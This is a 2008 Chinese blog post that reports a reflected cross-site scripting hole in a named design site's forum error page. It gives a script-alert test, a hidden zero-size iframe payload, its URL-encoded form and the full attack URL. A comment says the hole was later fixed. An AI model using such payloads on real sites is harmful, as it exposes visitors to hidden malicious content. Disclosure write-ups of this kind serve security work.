always there for you

善于生活,善于学习,这是我和你的目标.

« MS08-013:Microsoft Office 中远程执行代码漏洞【转帖】十招教你学会软件破解 »

依儿酷站跨网站漏洞

     刚刚到依儿酷站里溜达,那里有很多设计得很好的网页!

    因为本人没什么色觉细胞,配色也不行,所以经常去看看里面的Flash网站!.

    点击依儿的设计论坛的文章来看

     

     发现跳转到了bbs/error.asp这个页面,重要的是它传递的参数竟然是这样的(看下图):

     

     我试下看<script>alert("ww.alwaysthere.com.cn")</script>作为参数传递,竟然成功了,那就存在跨站脚本攻击的漏洞!

    

     假设:不坏好意者,在参数后加上<iframe src='恶意代码地址' width='0' height='0'></iframe>,再欺骗依儿的Fans们(例如我)点击,则能达到借刀杀人的作用!.

    这里我用了<iframe src='www.alwaysthere.com.cn' width='0' heigth='0'></iframe>

    再编下码变为:%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%77%77%77%2E%61%6C%77%61%79%73%74%68%65%72%65%2E%63%6F%6D%2E%63%6E%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%74%68%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E

    全部的地址就是:

   http://www.yi2.net/bbs/error.asp?message=%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%77%77%77%2E%61%6C%77%61%79%73%74%68%65%72%65%2E%63%6F%6D%2E%63%6E%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%74%68%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E

   这样就能靠上面的代码执行恶意代码!.

  

  

  • quote 1.小凡
  • http://www.faninfo.cn/blog
  • 不错,幸亏你发现,把漏给补了.
    ---
    你博客怎么变慢了..?
    alwaysthere 于 2008-5-5 15:56:55 回复
    不知道为什么会变慢,空间服务商的问题吧。有时会慢点,一般都挺好...
  • 2008-5-4 21:04:56 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

日历

最新评论及回复

最近发表

Copyright www.alwaysthere.com.cn . Some Rights Reserved.

              

Powered By Z-Blog 1.8 Devo Build 80201